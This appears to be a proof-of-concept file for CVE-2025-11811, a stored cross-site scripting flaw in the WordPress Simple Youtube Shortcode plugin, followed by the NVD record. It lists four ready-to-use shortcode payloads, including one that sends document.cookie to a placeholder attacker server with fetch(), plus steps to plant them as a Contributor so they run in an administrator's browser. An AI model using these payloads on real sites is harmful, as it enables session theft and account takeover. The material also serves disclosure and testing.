CVE-2025-11811

<!-- CVE-2025-11811 PoC - Stored XSS via embed_youtube shortcode 'id' attribute Target: WordPress Simple Youtube Shortcode Plugin <= 1.1.3 Required: Contributor-level access or above --> <!-- Attackers can inject malicious scripts through the 'id' attribute of the embed_youtube shortcode --> <!-- PoC 1: Basic XSS payload using script tag injection --> [embed_youtube id='"><script>alert(document.cookie)</script>'] <!-- PoC 2: XSS using img onerror event handler --> [embed_youtube id='" onerror="alert(document.domain)"><!--'] <!-- PoC 3: Cookie stealing payload (replace ATTACKER_SERVER with attacker's controlled server) --> [embed_youtube id='"><script>fetch("https://ATTACKER_SERVER/steal?cookie="+document.cookie)</script>'] <!-- PoC 4: Using iframe srcdoc to execute arbitrary HTML/JS --> [embed_youtube id='"><iframe srcdoc="<script>alert(1)</script>"></iframe>'] <!-- Steps to reproduce: 1. Log in to WordPress as a user with Contributor role or higher 2. Create a new Post or Page 3. Insert the malicious shortcode into the content editor 4. Publish the post (or submit for review if Contributor) 5. Visit the published page as any user (including admin) 6. The injected JavaScript will execute in the victim's browser context -->

{"cve": {"id": "CVE-2025-11811", "sourceIdentifier": "[email protected]", "published": "2025-10-22T09:15:33.033", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Simple Youtube Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embed_youtube' shortcode in all versions up to, and including, 1.1.3. This is due to insufficient input sanitization and output escaping on the 'id' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/simple-youtube-shortcode/tags/1.1.3/simple-youtube-shortcode.php#L60", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/simple-youtube-shortcode/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4f86d75b-f75e-4d5b-b0b8-a17a68e17048?source=cve", "source": "[email protected]"}]}}